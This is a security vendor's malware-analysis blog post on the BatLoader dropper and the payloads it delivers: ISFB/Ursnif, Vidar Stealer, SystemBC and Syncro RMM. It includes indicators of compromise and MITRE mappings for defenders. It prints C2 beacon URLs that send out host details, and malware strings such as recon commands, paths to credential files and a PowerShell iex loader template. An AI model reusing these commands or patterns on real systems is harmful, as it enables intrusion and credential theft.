What We Do
How We Do
Resources
Company
Partners
Get Started
Blog

eSentire Threat Intelligence Malware Analysis: BatLoader

BY eSentire Threat Response Unit (TRU)

March 30, 2023 | 20 MINS READ

Attacks/Breaches

Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin

Want to learn more on how to achieve Cyber Resilience?

TALK TO AN EXPERT

IN THIS POST

Since being introduced in February 2022, BatLoader is a malware dropper that has been observed dropping several well-known malware or malicious tools like ISFB, SystemBC RAT, Redline Stealer, and Vidar Stealer. Since its MSI installer file size is 100MB+, BatLoader can easily evade most sandboxes and antivirus tools.

This malware analysis delves deeper into the technical details of how the BatLoader malware operates and our security recommendations to protect your organization from being exploited.

Key Takeaways

  • BatLoader delivers additional malware and tools including ISFB, Vidar Stealer, Cobalt Strike, Syncro RMM, and SystemBC RAT via fake installers.
  • eSentire Threat Response Unit (TRU) observed two different BatLoader campaigns in 2022.
  • BatLoader can evade most antivirus detections due to the size of the MSI installers.
  • The loader drops certain malware if certain conditions of the infected host are met (e.g., ARP table, domain check).
  • The last BatLoader campaign performs the antivirus checks and is capable of modifying Windows UAC prompt, disabling Windows Defender notifications, disabling Task Manager, disabling command prompt, preventing users from accessing Windows registry tools, disabling the Run command, and modifying the display timeout.
  • eSentire TRU assesses with high confidence that BatLoader will remain active in the wild in 2023 and potentially serve as a first stage payload to deliver other malware.

Case Study BatLoader

In September 2022, eSentire TRU observed multiple BatLoader infections in Consumer Services, Retail, Telecommunications, and Non-Profit client environments. The initial infection starts with the user searching for installers such as Zoom, TeamViewer, AnyDesk, or FileZilla. The user navigates to the first advertisement displayed, which redirects the user to the website hosting the fake installer. The MSI installers are signed by “Kancelaria Adwokacka Adwokat Aleksandra Krzemińska” (Figures 1-2).

Figure 1: Fake Zoom Installer
Figure 2: Fake AnyDesk installer

In October and November 2022, we observed the second BatLoader campaign pushing fake installers such as TeamViewer (Figure 3), AnyDesk and LogMeIn. The infections were observed in Insurance, Consulting, Healthcare, and Printing industries.

Figure 3: Fake TeamViewer download page

We also observed several C2 domains related to BatLoader campaigns:

BatLoader Analysis (First Campaign)

BatLoader, named by Mandiant, is a malware dropper. The malware was first mentioned by Mandiant in February 2022. It’s worth noting that Mandiant mentioned the domain clouds222[.]com for the BatLoader campaign which also overlaps with the Zloader C2 domain.

eSentire TRU observed BatLoader dropping the following malware / malicious tools:

Figure 4: BatLoader infection chain

The MSI installer file is over 100MB in size; the large file size is implemented by threat actor(s) to evade sandboxes and antivirus products. The properties of the BatLoader MSI installer are shown in Figure 5. Within the MSI file, we have found the components of NovaPDF 11 (Figure 6) and other garbage files shown in Figure 7. The files reside within the C:\Program Files (x86)\Softland\novaPDF 11\Tools path that is created after the malicious MSI is successfully run, we also found NordVPNSetup.exe dropped within the same path. We believe that the files mentioned are used as a decoy.

Figure 5: Properties of the malicious MSI installer
Figure 6: NovaPDF 11 components
Figure 7: Decoy files

The main malicious trigger for the MSI installer resides under CustomAction table. Custom Actions are the operations defined by the user during installation or MSI execution. The malicious actor(s) create a custom action to run the malicious PowerShell inline script. The malicious script resides under AI_DATA_SETTER action name and contains the instructions to download the malicious update.bat file from the C2 domain and place it under AppData\Roaming folder (Figure 8). The PowerShell script is run via the PowerShell Core or pwsh.exe in a hidden window.

Figure 8: Malicious PowerShell script under CustomAction Table

The downloaded update.bat file is responsible for downloading requestadmin.bat file and NirCmd.exe binary (Figure 9).

Figure 9: Contents of update.bat

The requestadmin.bat is responsible for performing antivirus tampering – adding %APPDATA% and %USERPROFILE%\ paths to Windows Defender exclusion to prevent Defender from scanning the mentioned paths. The batch file was executed via nircmd.exe which was also downloaded from the C2; the utility allows the batch file to run in the background without displaying the user interface. Besides excluding the paths, the batch file also retrieves and executes the runanddelete.bat and scripttodo.ps1 scripts from the C2 via a native PowerShell command Invoke-WebRequest (Figure 10).

Figure 10: The contents of requestadmin.bat

The scripttodo.ps1 installs the GnuPg, the software that encrypts and signs the data and communications as shown in Figure 11.

Figure 11: GnuPg installation

Further down, the script enumerates the current domain that the user is logged into, the username, and obtains all entries within the IPs starting with 192., 10., and .172 in the ARP cache table. Once it completes that task, it then checks the amount of IPs found in the ARP table and completes a sum operation.

The requests to the C2 server are performed in the following format:

https://<C2 Server>/g5i0nq/index/d2ef590c0310838490561a205469713d/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname

https://<C2 Server>/g5i0nq/index/fa0a24aafe050500595b1df4153a17fb/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname

https://<C2 Server>/g5i0nq/index/i850c923db452d4556a2c46125e7b6f2/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname

https://<C2 Server>/g5i0nq/index/b5e6ec2584da24e2401f9bc14a08dedf/?servername=msi&arp="+ $IP_count + "&domain=" + $UserDomain + "&hostname=" + $UserPCname

Figure 12: Enumerating the host and retrieving malware from C2 based on the conditions

If the mentioned conditions are not satisfied, the script retrieves the GPG-encrypted files:

If all the conditions are met, the script retrieves the following files:

We were unable to retrieve the shutdowni.bat file but we believe the script might have been deployed to restart the host.

The GPG decryption routine was borrowed from the script hosted on GitHub (Figure 13). The script looks for files ending with gpg in %APPDATA% folder and decrypts them using the password 105b.

Figure 13: GPG decryption snippet

Moreover, the scripttodo.ps1 recursively removes the implementation of Windows Defender IOfficeAntiVirus under HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}. The IOfficeAntivirus component is responsible for detecting malicious or suspicious files downloaded from the Internet. It then adds the extensions such as exe and DLL as exclusions to Windows Defender. Additionally, the script downloads Nsudo.exe tool to be able to run files and programs with full privileges.

We have mentioned that besides scripttodo.ps1, the runanddelete.bat (Figure 14) file was retrieved. The batch file is responsible for running a malicious executable d2ef5.exe with administrator privileges by creating a VBS script getadmin.vbs under %TEMP% folder to run the binary, but first the user would get an alert prompt from User Account Control (UAC) to allow the program to make changes.

Figure 14: Contents of runanddelete.bat file

The Secrets of BatLoader

The binary d2ef5.exe is the ISFB banking malware also known as the successor of Gozi or Ursnif. The first Gozi variant was first discovered by SecureWorks in 2007 and is still active today, spreading through phishing emails and loaders. The Ursnif version we observed can exfiltrate browser credentials and cookies, Thunderbird and Outlook profiles, POP3, SMTP passwords. The strings “*terminal* *wallet* *bank* *banco*” were also observed which suggests that Ursnif is also capable of stealing cryptocurrency from digital wallets and banking credentials.

Upon execution, ISFB creates a persistence via Registry Run Keys under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. The registry value VirtualStop (the registry values can be different based on the wordlist table hardcoded in the binary). The registry value contains the command that launches the shortcut (LNK) which contains powershell.exe in the relative path. The PowerShell starts the CollectMirrow.ps1 script under %USERPROFILE% folder bypassing the PowerShell’s execution policy.

The command execution example:

cmd /c start C:\Users\<username>\VirtualStop.lnk -ep unrestricted -file C:\Users\<username>\CollectMirrow.ps1

The CollectMirror.ps1 script contains the PowerShell one-liner (Figure 15) that pulls the written data from the registry under HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\<registry_value>>, specifically the TestMouse value (Figure 16).

Figure 15: Contents of CollectMirror.ps1
Figure 16: Contents of TestMouse registry value

The script performs process injection using the API such as OpenThread (to create a handle to an existing process), VirtualAlloc (memory allocation in the chosen process), and QueueUserAPC, the thread that the APC (Asynchronous Procedure Calls) is queued to has to enter an alertable state, this can be achieved by invoking SleepEx as shown in Figure 17.

We have observed ISFB injecting itself into a running explorer.exe process. The unpacked sample is approximately 540 KB (MD5: 3aaf34ffbe45e4f54b37392ad1afe9a5).

Figure 17: Process injection

We have observed ISFB injecting itself into a running explorer.exe process. The unpacked sample is approximately 540 KB (MD5: 3aaf34ffbe45e4f54b37392ad1afe9a5). You can read the very well-written analyses by Daniel Bunce here and here, but we will cover the main basics of malware.

The payload locates the BSS section which is where the encrypted strings reside within the function shown in Figure 18 (the hex string 81 38 2E 62 73 73 contains ‘bss’).

Figure 18: Payload locating the .bss section

The data stored in the BSS section is encoded as shown in Figure 19.

Figure 19: Snipped of the encoded data in the BSS section

The decryption function is shown below, the decryption function can be represented as the following pseudocode:

Figure 20: Decryption function pseudocode

The decryption function takes 4 bytes of the encrypted data in BSS at a time and converts them into an integer, then subtracts the key from the index value and adds to the DWORD value which is 4 bytes.

The decompiled code can be seen in Figure 21. The decryption function is thoroughly described by 0verfl0w (Daniel Bunce) here. Part of the key is derived from the division operations from the value retrieved from API call GetSystemTimeAsFileTime (retrieving system time). Another part of the key is embedded in our payload which is 0x81b8e7da. Applying the key to the decryption function (Figure 22) and part of the key derived from system time (which is 19) gave us the decrypted data (Figure 23).

Figure 21: Decompiled decryption function
Figure 22: Decryption function in Python
Figure 23: Decrypted strings

The second decompressed data blob contains the following:

C2: trackingg-protectioon.cdn1.mozilla[.]net, 45.8.158[.]104, trackingg-protectioon.cdn1.mozilla[.]net, 188.127.224[.]114, weiqeqwns[.]com, wdeiqeqwns[.]com, weiqeqwens[.]com, weiqewqwns[.]com, iujdhsndjfks[.]com

Botnet ID: 10101

Server ID: 50

Key: T3H5l6EZGEh6GkB5

Directory: /uploaded

Extension: .dib, .pct (beacon extension)

Sleep time: 1 second

ConfigTimeout (time interval to check for a new configuration): 20 seconds

The third blob contains the wordlist values shown below:

['list', 'stop', 'computer', 'desktop', 'system', 'service', 'start', 'game', 'stop', 'operation', 'black', 'line', 'white', 'mode', 'link', 'urls', 'text', 'name', 'document', 'type', 'folder', 'mouse', 'file', 'paper', 'mark', 'check', 'mask', 'level', 'memory', 'chip', 'time', 'reply', 'date', 'mirrow', 'settings', 'collect', 'options', 'value', 'manager', 'page', 'control', 'thread', 'operator', 'byte', 'char', 'return', 'device', 'driver', 'tool', 'sheet', 'util', 'book', 'class', 'window', 'handler', 'pack', 'virtual', 'test', 'active', 'collision', 'process', 'make', 'local', 'core']

These words are used to build the registry value names.

Another interesting feature of the ISFB is that it stores three embedded binaries within the unpacked payload. The binaries are compressed using APLib compression algorithm. The decompression function is shown in Figure 24.

Figure 24: APLib decompression function

To be able to locate the embedded compressed binaries, we need to find the structure of the ISFB payload where it stores the configuration. The configuration contains the payload marker or header, XOR key, CRC32 hash, the offset, and the size of each compressed binary (Figure 25). The payload marker defines the version of ISFB.

FJ – old ISFB version

J1 – old ISFB version

J2 – DreamBot version

J3 – ISFB v3 Japan

JJ – ISFB v2.14 and above

WD – RM3

Figure 25: Header section containing the configuration

The compressed data is separated by the null bytes as shown in Figure 26. You can see something resembling C2 domains in the first blob.

Figure 26: Snippet of the compressed data

We wrote a Python script to extract the compressed data and decompress them (Figure 27). The first compressed blob contains the RSA public key with the hash 0xe1285e64 (Figure 28).

Figure 27: Python script to extract and decompress data blobs
Figure 28: RSA public key blob

ISFB also stores the configuration within the function that parses the payload header (Figure 29). The hash values are calculated by XORing the value 0x69b25f44 (known as g_CsCookie from the leaked code) with the values that match with CRC_CLIENT32 (again, from the leaked code).

Figure 29: Snippet of the configuration hashes and payload header parsing

The following are the hashes of the payload as a result of XORing:

0x11271c7f – timer

0x48295783 – timer

0x584e5925 – botnet

0x556aed8f – server

0x4fa8693e – key

0xd0665bf6 – domains

0x54432e74– directory

0xbbb5c71d – extension

The traffic beaconing contains the following pattern that will be encrypted with the AES key extracted from the compressed blob:

soft=%u&version=%u&user==%08x%08x%08x%08x &server=50&id=10101&crc=61f03b3&uptime=102696&action=%08x&dns=%s&whoami=%s&os=%s

soft, version – version of the payload

user – the value calculated from applying the RNG (Random Number Generator) algorithm, using the username, computer name, XOR operations, and cpuid call.

server – server ID

id – botnet ID

uptime – is the value based on the API calls QueryPerformanceFrequency and QueryPerformanceCounter

dns – computer name

os – OS version and system type

The example of the encrypted with AES-128 beacon, replacing + with _2B and / with _2F, the / are also being added:

/uploaded/V1jd62QM3JcPMZGTpdjl2I/mEcoduKcJlNZo/S1Tq0KYy/M2ZEZFPG3iasm8TVeZ5oYf7/m_2FHfl318/E2HneynLJsT2KcKW6/MBeMivC1RFEh/TAL8bLaLD_2/B1Hg1OTg4XQwlG/IJbZJIe0rxQ0SYwzWgYte/TfzvWXXywf9HHwRL/2ZSv_2BcgktHGaZ/hRo7dwwYV3D39_2Bmc/JmEz3Z359/UhGcxj4s_2F80Krry3Kf/tI6i_2BxIXB2d6WASfJ/NCIpYT61pYgL53jx8SghJH/pQnAADp6racXs/VdB_2FRy/o74GaLVJG9neXweATdYNR/5.pct

Some interesting strings found:

/data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s

\Software\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

%APPDATA%\Mozilla\Firefox\Profiles

EnableSPDY3_0

\Macromedia\Flash Player\

cookies.sqlite

cookies.sqlite-journal

Mozilla\Firefox\Profiles

Microsoft\Edge\User Data\Default

Google\Chrome\User Data\Default

--use-spdy=off --disable-http2

Cmd %s processed: %u

Cmd %u parsing: %u

cmd /C "%s> %s1"

wmic computersystem get domain |more

systeminfo.exe

tasklist.exe /SVC >

driverquery.exe >

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >

cmd /U /C "type %s1 > %s & del %s1"

net view >

nslookup 127.0.0.1 >

nslookup myip.opendns.com resolver1.opendns.com

net config workstation >

nltest /domain_trusts >

nltest /domain_trusts /all_trusts >

net view /all /domain >

net view /all >

user_pref("network.http.spdy.enabled", false);

Software\Microsoft\Windows Mail

Software\Microsoft\Windows Live Mail

account{*}.oeaccount

Account_Name

encryptedUsername

SMTP_Email_Address

encryptedPassword

EmailAddressCollection/EmailAddress[%u]/Address

Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\

Account Name

IMAP Server

IMAP Password

IMAP Use SSL

POP3 Server

POP3 Password

POP3 Use SSL

SMTP Server

SMTP Password

SMTP Use SSL

%PROGRAMFILES%\Mozilla Thunderbird

%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default

\logins.json

/C pause dll

cache2\entries\*.*

cmd /c start %s -ep unrestricted -file %s

new-alias -name %s -value gp;new-alias -name %s -value iex;%s ([System.Text.Encoding]::ASCII.GetString((%s "HKCU:\%s").%S))

ipconfig /all

file://c:\test\test32.dll

file://c:\test\tor64.dll

30, 8, *terminal* *wallet* *bank* *banco*

Man-in-the-browser is another capability of Ursnif. You might have noticed strings such as “user_pref("network.http.spdy.enabled", false);”, “EnableSPDY3_0” and “--use-spdy=off --disable-http2”. Ursnif disables SPDY and HTTP/2 (successor of SPDY protocol) on the infected host. The protocols allow HTTP data compression to achieve minimal latency. With the protocol implementation, threat actor(s) might have to spend additional time attempting to modify and intercepting the web traffic.

We still see some remanences from the Ursnif DreamBot in ISFB v2 (file://c:\test\tor64.dll), which might suggest that the Tor communication capability is still possible.

Vidar Stealer, SystemBC, and Syncro RMM Agent

Botnet: 1259

Version: 54.7

C2: t[.]me/trampapanam, nerdculture[.]de/@yoxhyp

Upon successful infection, first, the host would reach out to the C2 and retrieve the DLLs (Dynamic Link Library) dependencies such as vcruntime140.dll, sqlite3.dll, softokn3.dll, nss3.dll, msvcp140.dll, mozglue.dll, freebl3.dll for the stealer to be able to extract credentials and cookies from browsers and to function properly. If you are interesting in understanding in more depth what each library is responsible for, you can review our blog on Mars Stealer.

The stealer then collects the credentials, host information, files, and screenshot and sends it over as a ZIP archive in a base64-encoded format as shown in Figure 30.

Figure 30: Vidar exfiltrating stolen data

We are in the processing of completing a technical analysis of Vidar Stealer, which will be our next blog.

Syncro RMM is a Remote Monitoring and Management tool used to control and manage devices remotely. In the hands of a malicious actor, this tool can be used as a persistence mechanism and remote accessing.

SystemBC RAT also known as “socks5 backconnect system” (MD5: 8ea797eb1796df20d4bdcadf0264ad6c) is a malware that leverages SOCKS5 proxies to hide malicious traffic, it also has the capability of sending additional payloads to the hosts (Figure 31).

Figure 31: Leaked SystemBC on a hacking forum

The RAT creates the mutex “wow64” with the “start” as an argument (“start” will also be used as an argument for the scheduled task command). If the mutex is not present – the RAT will reach out to the C2. The C2 configuration is shown below:

HOST1: 188.127.224.46

HOST2: hgfiudtyukjnio[.]com

PORT1: 4251

TOR: 0

If the mutex is present on the host, the instruction would proceed further to check the integrity level of the current malicious process, then it compares to the value 1000 which is SECURITY_MANDATORY_LOW_RID (low integrity level, SID: S-1-16-0), this means the process is restricted and has limited write permissions.

Figure 32: Function responsible for calling C2, task scheduling, and mutex creation

SystemBC is capable of executing scripts and commands retrieved from C2 such as ps1, bat, vbs, and exe (Figure 33).

Figure 33: Scripts supported by SystemBC

BatLoader Analysis (Second Campaign)

The second campaign we observed is slightly different than the first one. The MSI installer (MD5: 099483061f8321e70ce86c9991385f48) with the signature “Tax In Cloud sp. z o.o.” does not come with an embedded PowerShell script. Instead, the installer pushes “avolkov.exe” binary to the infected machine and creates the registry key containing the path of the dropped binary which is AppData/Local/ SetupProject1 (Figure 34).

Figure 34: Malicious MSI installer creating the registry key and dropping the binary file under AppData/Local/SetupProject1

The avolkov.exe binary (MD5: d41e0fee0ec6c2e3da56a6dcf53607da) utilizes libcurl 7.85.0 which enables the data transfer with URL syntax for protocols such as HTTP/HTTPS, FTP, DICT, SMTP, IMAP, POP3, LDAP, acting as a potential backdoor and loader. The binary has the C2 embedded inside the binary from where it retrieves the newtest.bat file (Figure 35). The batch script is responsible for pulling additional BatLoader payloads and scripts from C2 such as:

Figure 35: Contents of newtest.bat

The requestadmin.bat (Figure 36) retrieved from the second campaign is different compared to the first campaign. The threat actor(s) made sure to add more paths and folders to Windows Defender exclusion including %TEMP% and C:\Windows\* as well as adding .ps1 (PowerShell) extension to the exclusion list.

We observed that the script retrieves NSudo and modifies Windows UAC prompt behavior by allowing administrators to perform operations without authentication or consent prompts:

The script also no longer pulls runanddelete.bat file from the C2.

Figure 36: Contents of requestadmin.bat

The scripttodo.ps1 file still retrieves the same files from the C2, the Cobalt Strike payload (d655) was changed to a DLL instead of EXE and shutdowni.bat is no longer pulled from the C2.

user.ps1 (Figure 37) is similar to scriptodo.ps1 in terms of enumerating the current domain of the host, username, and ARP table.

Interestingly enough, we have observed QakBot using the same ordinal name to run Cobalt Strike payloads.

Figure 37: Contents of the user.ps1

Another new addition to BatLoader is the antivirus check script (checkav.ps1). The script checks the host against the list of antiviruses and sends it out to C2 server (Figure 38).

Figure 38: Contents of checkav.ps1

Later, threat actor(s) switched from externalchecksso[.]com to internalchecksso[.]com. The scripttodo.ps1 was also changed to ru.ps1 as well as the names for malicious binaries as shown in Figure 39.

Figure 39: Contents of ru.ps1

How eSentire is Responding

Our Threat Response Unit (TRU) combines threat intelligence obtained from continuous research and security incidents to create practical outcomes for our customers. We are taking a full-scale response approach to ongoing cybersecurity threats by deploying countermeasures, such as:

Our detection content is supported by investigation runbooks, ensuring our 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures. In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.

Recommendations from eSentire's Threat Response Unit (TRU)

We recommend implementing the following controls to help secure your organization against BatLoader malware:

While the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.

eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.

Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.

Appendix

Indicators of Compromise

Name Indicators
BatLoader C2 updatea1[.]com
BatLoader C2 externalchecksso[.]com
BatLoader C2 internalcheckssso[.]com
Ursnif C2 weiqeqwns[.]com
Ursnif C2 > wdeiqeqwns[.]com
Ursnif C2 weiqeqwens[.]com
Ursnif C2 weiqewqwns[.]com
Ursnif C2 iujdhsndjfks[.]com
Ursnif C2 trackingg-protectioon.cdn1.mozilla[.]net
Ursnif C2 45.8.158[.]104
Ursnif C2 188.127.224[.]114
Ursnif C2 siwdmfkshsgw[.]com
Vidar Stealer t[.]me/trampapanam
Ursnif C2 Ijduwhsbvk[.]com
Vidar Stealer nerdculture[.]de/@yoxhyp
SystemBC C2 hgfiudtyukjnio[.]com
SystemBC C2(overlaps with Ursnif C2 ISP) 188.127.224[.]46
Cobalt Strike C2 139.60.161[.]74
Redline C2 176.113.115[.]10

MITRE ATT&CK

MITRE ATT&CK Tactic

ID

MITRE ATT&CK Technique

Description

MITRE ATT&CK Tactic

Initial Access

ID

T1189

MITRE ATT&CK Technique

Drive-by Compromise

Description

BatLoader is delivered via fake software installers

MITRE ATT&CK Tactic

User Execution

ID

T1204.002

MITRE ATT&CK Technique

Malicious File

Description

The user launches the malicious MSI file

MITRE ATT&CK Tactic

Persistence

ID

T1547.001

MITRE ATT&CK Technique

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Description

As a result of BatLoader infection, ISFB malware creates the persistence via Registry Run Keys. Syncro RMM can also be used as a persistence mechanism

MITRE ATT&CK Tactic

Defense Evasion

ID

T1562.001

MITRE ATT&CK Technique

Impair Defenses: Disable or Modify Tools

Description

Disabling Windows Defender notifications, Task Manager and Command Prompt

MITRE ATT&CK Tactic

Process Injection

ID

T1055

Description

ISFB injects itself into explorer.exe as a result of successful BatLoader infection

MITRE ATT&CK Tactic

Unsecured Credentials

ID

T1552.001

MITRE ATT&CK Technique

Unsecured Credentials: Credentials In Files

Description

The ISFB version observed is capable of accessing browser credentials and cookies, Thunderbird and Outlook profiles, POP3, SMTP passwords.

eSentire Unit
eSentire Threat Response Unit (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.

Read the Latest from eSentire